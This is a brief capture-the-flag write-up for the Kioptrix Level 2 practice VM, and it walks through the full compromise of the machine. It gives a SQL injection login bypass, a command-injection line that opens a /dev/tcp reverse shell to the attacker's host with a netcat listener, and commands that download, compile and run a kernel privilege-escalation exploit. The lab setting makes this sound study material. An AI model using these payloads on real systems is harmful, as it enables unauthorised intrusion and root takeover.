This is my writeup for the Kioptrix Level 2 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.
We now have a list of ports. When we access the IP of the VM on port 80, we see a login form which can be bypassed by entering:
username: admin' '1'or'1
We then find a console asking us to enter an IP to ping. It kinda begs for malicious input.
$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Searchsploit returns https://www.exploit-db.com/exploits/9542/.
Start netcat on kali:
$ nc -nvlp 42
Try to connect back:
1;0<&196;exec 196<>/dev/tcp/192.168.254.161/42; sh <&196 >&196 2>&196
Since we now have a reverse shell we can run the mentioned exploit.
$ curl -k https://www.exploit-db.com/download/9542/ > exploit.c $ gcc -o exploit exploit.c $ chmod +x exploit $ ./exploit